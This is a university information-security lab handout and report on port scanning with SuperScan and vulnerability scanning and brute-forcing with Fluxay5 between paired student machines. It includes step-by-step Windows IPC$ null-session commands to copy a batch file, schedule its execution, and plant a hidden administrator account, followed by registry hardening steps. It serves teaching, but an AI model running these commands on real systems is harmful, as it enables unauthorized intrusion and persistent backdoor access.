實(shí)驗(yàn)2 網(wǎng)絡(luò)掃描及安全評(píng)估實(shí)驗(yàn)
HUNAN UNIVERSITY《信息安全原理》實(shí)驗(yàn)報(bào)告實(shí)驗(yàn)二 網(wǎng)絡(luò)掃描及安全評(píng)估實(shí)驗(yàn)一、實(shí)驗(yàn)?zāi)康恼莆站W(wǎng)絡(luò)端口掃描器的使用方法,熟悉常見(jiàn)端口和其對(duì)應(yīng)的服務(wù)程序,掌握發(fā)現(xiàn)系統(tǒng)漏洞的方法。
HUNAN UNIVERSITY
《信息安全原理》實(shí)驗(yàn)報(bào)告
實(shí)驗(yàn)二 網(wǎng)絡(luò)掃描及安全評(píng)估實(shí)驗(yàn)
一、實(shí)驗(yàn)?zāi)康?/p>
掌握網(wǎng)絡(luò)端口掃描器的使用方法,熟悉常見(jiàn)端口和其對(duì)應(yīng)的服務(wù)程序,掌握發(fā)現(xiàn)系統(tǒng)漏洞的方法。
,● 掌握綜合掃描及安全評(píng)估工具的使用方法,了解進(jìn)行簡(jiǎn)單系統(tǒng)漏洞入侵的方法,了解常
見(jiàn)的網(wǎng)絡(luò)和系統(tǒng)漏洞以及其安全防護(hù)方法。
二、實(shí)驗(yàn)原理 ● 端口掃描原理
● 端口掃描向目標(biāo)主機(jī)的TCP/IP服務(wù)端口發(fā)送探測(cè)數(shù)據(jù)包,并記錄目標(biāo)主機(jī)的響應(yīng)。
通過(guò)分析響應(yīng)來(lái)判斷服務(wù)端口是打開(kāi)還是關(guān)閉,就可以得知端口提供的服務(wù)或信息。
● 端口掃描主要有經(jīng)典的掃描器(全連接)、SYN (半連接)掃描器、秘密掃描等。 ● 全連接掃描:掃描主機(jī)通過(guò)TCP/IP協(xié)議的三次握手與目標(biāo)主機(jī)的指定端口建立一
次完整的連接。建立連接成功則響應(yīng)掃描主機(jī)的SYN/ACK連接請(qǐng)求,這一響應(yīng)表明目標(biāo)端口處于監(jiān)聽(tīng)(打開(kāi))的狀態(tài)。如果目標(biāo)端口處于關(guān)閉狀態(tài),則目標(biāo)主機(jī)會(huì)向掃描主機(jī)發(fā)送RST 的響應(yīng)。
● 半連接(SYN )掃描 :若端口掃描沒(méi)有完成一個(gè)完整的TCP 連接,在掃描主機(jī)和目
標(biāo)主機(jī)的一指定端口建立連接時(shí)候只完成了前兩次握手,在第三步時(shí),掃描主機(jī)中斷了本次連接,使連接沒(méi)有完全建立起來(lái),這樣的端口掃描稱為半連接掃描,也稱為間接掃描。
● TCP FIN(秘密)掃描:掃描方法的思想是關(guān)閉的端口會(huì)用適當(dāng)?shù)腞ST 來(lái)回復(fù)FIN
數(shù)據(jù)包。另一方面,打開(kāi)的端口會(huì)忽略對(duì)FIN 數(shù)據(jù)包的回復(fù)。
● 綜合掃描和安全評(píng)估技術(shù)工作原理
● 獲得主機(jī)系統(tǒng)在網(wǎng)絡(luò)服務(wù)、版本信息、Web 應(yīng)用等相關(guān)信息,然后采用模擬攻擊的
方法,對(duì)目標(biāo)主機(jī)系統(tǒng)進(jìn)行攻擊性的安全漏洞掃描,如果模擬攻擊成功,則視為漏洞存在。最后根據(jù)檢測(cè)結(jié)果向系統(tǒng)管理員提供周密可靠的安全性分析報(bào)告。
三、實(shí)驗(yàn)環(huán)境
● 實(shí)驗(yàn)室所有機(jī)器安裝了Windows 操作系統(tǒng),并組成了一個(gè)局域網(wǎng),并且都安裝了
SuperScan 端口掃描工具和流光Fluxay5綜合掃描工具。
● 每?jī)蓚€(gè)學(xué)生為一組:互相進(jìn)行端口掃描和綜合掃描實(shí)驗(yàn)。
四、實(shí)驗(yàn)內(nèi)容和步驟
● 任務(wù)一:使用Superscan 端口掃描工具并分析結(jié)果
● 任務(wù)二:使用綜合掃描工具Fluxay5并分析結(jié)果
● 撰寫(xiě)實(shí)驗(yàn)報(bào)告
任務(wù)一:使用Superscan 端口掃描工具并分析結(jié)果
Superscan使用簡(jiǎn)介:
任務(wù)一:使用Superscan 端口掃描工具并分析結(jié)果(續(xù))
選擇【Port list setup】,進(jìn)行端口列表設(shè)置
,掃描結(jié)果分析
任務(wù)一:使用Superscan 端口掃描工具并分析結(jié)果(續(xù))
,分組角色:學(xué)生A 、學(xué)生B 互相掃描對(duì)方主機(jī)。
實(shí)驗(yàn)步驟:
(1)在命令符提示下輸入IPCONFIG 查詢自己的IP 地址。
(2)在Superscan 中的Hostname Lookup 欄中,輸入同組學(xué)生主機(jī)的IP 地址,可通過(guò)單擊Lookup 按鈕獲得主機(jī)名。
(3)設(shè)置IP 欄、Scan type 欄、Scan 欄,使其對(duì)同組學(xué)生主機(jī)的所有端口以默認(rèn)的時(shí)間參數(shù)進(jìn)行掃描。
(4)根據(jù)掃描結(jié)果分析主機(jī)開(kāi)放的端口類型和對(duì)應(yīng)的服務(wù)程序。
(5)通過(guò)“控制面板”的“管理工具”中的“服務(wù)”配置 ,嘗試關(guān)閉或開(kāi)放目標(biāo)主機(jī)上的部分服務(wù),重新掃描,觀察掃描結(jié)果的變化。
任務(wù)一:使用Superscan 端口掃描工具并分析結(jié)果(續(xù))
● 常見(jiàn)端口的關(guān)閉方法:
● 1、關(guān)閉7.9等端口:關(guān)閉Simple TCP/IP Service, 支持以下 TCP/IP 服務(wù):Character
Generator, Daytime, Discard, Echo, 以及 Quote of the Day。
2、關(guān)閉80端口:關(guān)掉WWW 服務(wù)。在“服務(wù)”中顯示名稱為“World Wide Web Publishing Service ”,通過(guò) Internet 信息服務(wù)的管理單元提供 Web 連接和管理。
3、關(guān)掉25端口:關(guān)閉Simple Mail Transport Protocol (SMTP)服務(wù),它提供的功能是跨網(wǎng)傳送電子郵件。
4、關(guān)掉21端口:關(guān)閉FTP Publishing Service,它提供的服務(wù)是通過(guò) Internet 信息服務(wù)的管理單元提供 FTP 連接和管理。
5、關(guān)掉23端口:關(guān)閉Telnet 服務(wù),它允許遠(yuǎn)程用戶登錄到系統(tǒng)并且使用命令行運(yùn)行控制臺(tái)程序。
6、關(guān)掉139端口,139端口是NetBIOS Session 端口,用來(lái)文件和打印共享, 關(guān)閉139口聽(tīng)方法是在“網(wǎng)絡(luò)和撥號(hào)連接”中“本地連接”中選取“Internet 協(xié)議(TCP/IP)”屬性,進(jìn)入“高級(jí)TCP/IP設(shè)置”“WINS 設(shè)置”里面有一項(xiàng)“禁用TCP/IP的NETBIOS ”,打勾就關(guān)閉了139端口。
● 利用TCP/IP篩選:網(wǎng)上鄰居屬性-本地連接屬性-常規(guī)-internet 協(xié)議 (TCP/IP)屬性-
高級(jí)-選項(xiàng)-TCP/IP篩選-屬性-TCP 端口-只允許139,445,這樣其他端口都被關(guān)閉了。
任務(wù)二:使用流光Fluxay5綜合掃描工具并分析結(jié)果
,各部份功能:
1: 暴力破解的設(shè)置區(qū)域
2:控制臺(tái)輸出
3:掃描出來(lái)的典型漏洞列表
4:掃描或者暴力破解成功的用戶帳號(hào)
5:掃描和暴力破解的速度控制
6:掃描和暴力破解時(shí)的狀態(tài)顯示
7:中止按鈕
8:探測(cè)記錄查找
任務(wù)二:使用流光Fluxay5綜合掃描工具并分析結(jié)果(續(xù))
選擇“文件(F )”→“高級(jí)掃描向?qū)В╓ )”可打開(kāi)高級(jí)掃描向?qū)?,設(shè)置掃描參數(shù) 。 掃描結(jié)束后,流光會(huì)自動(dòng)打開(kāi)HTML 格式的掃描報(bào)告,
而且還把可利用的主機(jī)列在流光界面的最下方,如圖1所示。
圖1
單擊主機(jī)列表中的主機(jī)便可以直接對(duì)目標(biāo)主機(jī)進(jìn)行連接操作,如圖2所示。
圖2
,除了使用“高級(jí)掃描向?qū)А迸渲酶呒?jí)掃描外,還可以在探測(cè)菜單中直接選取高級(jí)掃描工具設(shè)置:
分組角色:學(xué)生A 、學(xué)生B 互相掃描對(duì)方主機(jī)。
實(shí)驗(yàn)步驟:
(1)開(kāi)放FTP 服務(wù),允許匿名連接。
(2)打開(kāi)流光FLUXAY5工具,使用“高級(jí)掃描向?qū)А边M(jìn)行設(shè)置,使其能對(duì)同組學(xué)生主機(jī)的全部端口、服務(wù)、漏洞、所有用戶等進(jìn)行全面的掃描。
(3)仔細(xì)觀察掃描結(jié)果,分析同組學(xué)生主機(jī)上存在的各種漏洞。
(4)根據(jù)掃描結(jié)果分析FTP 漏洞:如結(jié)果顯示有漏洞,則利用“流光”提供的入侵菜單進(jìn)行FTP 連接,嘗試上傳或下載文件。
(5)根據(jù)掃描結(jié)果分析IPC$漏洞:
IPC 是為了讓進(jìn)程間通信而開(kāi)放的命名管道,可以通過(guò)驗(yàn)證用戶名和密碼獲得相應(yīng)的權(quán)限,在遠(yuǎn)程管理計(jì)算機(jī)和查看計(jì)算機(jī)的共享資源時(shí)使用。利用IPC$,連接者可以與目標(biāo)主機(jī)建立一個(gè)空連接而無(wú)需用戶名和密碼,從而可以得到目標(biāo)主機(jī)上的用戶列表,并可能破解用戶密碼。
IPC$相關(guān)命令:
● 建立和目標(biāo)的ipc$連接命令:net use 目標(biāo)IPipc$ “密碼” /user:“ADMIN ”
(管理員賬號(hào)),如:net use 2.168.27.128ipc$ “” /user:"administrator" ● 映射網(wǎng)絡(luò)驅(qū)動(dòng)器命令(將目標(biāo)主機(jī)的盤(pán)映射到本地磁盤(pán) ):net use 本地盤(pán)符
目標(biāo)IP 盤(pán)符$,如:net use z: 2.168.27.128c$
● 和目標(biāo)建立了ipc$后,則可直接用IP 加盤(pán)符加$訪問(wèn)。比如:copy 文件名 IP
盤(pán)符$路徑文件名,如:copy hack.bat 2.168.27.128c$,也可直接對(duì)映射為本地磁盤(pán)的網(wǎng)絡(luò)驅(qū)動(dòng)器操作。
● 管理計(jì)算機(jī)上面的賬號(hào)命令:net user
● 查看賬號(hào)命令:net user
● 建立賬號(hào)命令:net user name passwd /add(net user sysbak 123456 /add :
添加用戶名為sysback ,密碼為123456的賬號(hào) )
刪除賬號(hào)命令:net user name /delete
● 管理工作組命令:net localgroup 組名 用戶名 /add[delete]
● 如:net localgroup administrators sysback /add。該命令表示把sysback
用戶添加到管理員組(administrators )。
● 查看目標(biāo)計(jì)算機(jī)的系統(tǒng)時(shí)間:net time ip
,● 在遠(yuǎn)程主機(jī)上建立計(jì)劃任務(wù):at IP TIME COMMAND
● at 2.168.27.128 13:45 c:hack.bat (該命令表示在下午13點(diǎn)45分執(zhí)
行目標(biāo)主機(jī)C 盤(pán)中的hack.bat 文件, 時(shí)間一定要晚于當(dāng)前遠(yuǎn)程主機(jī)系統(tǒng)時(shí)間) ● 刪除和目標(biāo)的ipc$連接命令: net use IPipc$ /del
● 斷開(kāi)所有IPC$連接: net use * /del
● 禁止建立空連接 :運(yùn)行regedit ,找到主鍵[HKEY_LOCAL_MACHINE SYSTEM
CurrentControlSet Control LSA] ,把RestrictAnonymous (DWORD )的鍵值改為:00000001。
禁止自動(dòng)打開(kāi)默認(rèn)共享 :找到主鍵
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLanmanServerParameters],把AutoShareServer (DWORD )的鍵值改為:00000000,
如果不存在,就新建一個(gè)再改鍵值。
● 利用破解的用戶ADMINISTRATOR 對(duì)目標(biāo)主機(jī)進(jìn)行留后門(mén)入侵,步驟:
● 編寫(xiě)批處理文件hack.bat ,文件中包含兩個(gè)命令:1)建立一個(gè)新賬號(hào),2)將新
賬號(hào)加入administrators 組。
● 使用net 命令與目標(biāo)主機(jī)建立連接
● 將批處理文件hack.back 拷貝至目標(biāo)主機(jī)上。
● 通過(guò)計(jì)劃任務(wù)使目標(biāo)主機(jī)執(zhí)行hack.bat 文件。
● 斷開(kāi)所有IPC$連接。
● 通過(guò)采用新賬號(hào)與目標(biāo)主機(jī)建立連接來(lái)驗(yàn)證賬號(hào)是否成功建立。
● 刪除和目標(biāo)主機(jī)的連接。
● 執(zhí)行安全防護(hù)措施:
● 目標(biāo)主機(jī)對(duì)注冊(cè)表進(jìn)行修改:禁止建立空連接,禁止自動(dòng)打開(kāi)默認(rèn)共享 ● 重新使用net 命令與目標(biāo)主機(jī)建立連接,觀察結(jié)果是否有變化。
實(shí)驗(yàn)報(bào)告要求
內(nèi)容:
一、根據(jù)任務(wù)一的掃描結(jié)果,寫(xiě)出主機(jī)開(kāi)放的端口類型和服務(wù)。同時(shí)寫(xiě)出嘗試關(guān)閉或開(kāi)放目標(biāo)主機(jī)上的部分服務(wù)后重新掃描的新結(jié)果。
二、根據(jù)任務(wù)二的掃描結(jié)果,記錄被掃描方的用戶列表、提供的服務(wù)、共享的目錄和已經(jīng)存在的漏洞,分析這些漏洞,寫(xiě)出是系統(tǒng)哪方面設(shè)置防范不合理造成的,寫(xiě)出解決措施。
,實(shí)驗(yàn)結(jié)果:
1. 使用Superscan 端口掃描工具
在使用軟件之前,我們先來(lái)看看軟件的全貌(圖一)
圖一
界面比較復(fù)雜,我們根據(jù)共享功能來(lái)介紹使用。
一)域名(主機(jī)名)和IP 相互轉(zhuǎn)換
這個(gè)功能的作用就是取得域名比如:163.com 的IP ;或者根據(jù)IP :202.106.185.77取得域名。
在SuperScan 里面,有兩種方法來(lái)實(shí)現(xiàn)此功能:
(1)通過(guò)Hostname Lookup來(lái)實(shí)現(xiàn)(如圖二)
圖二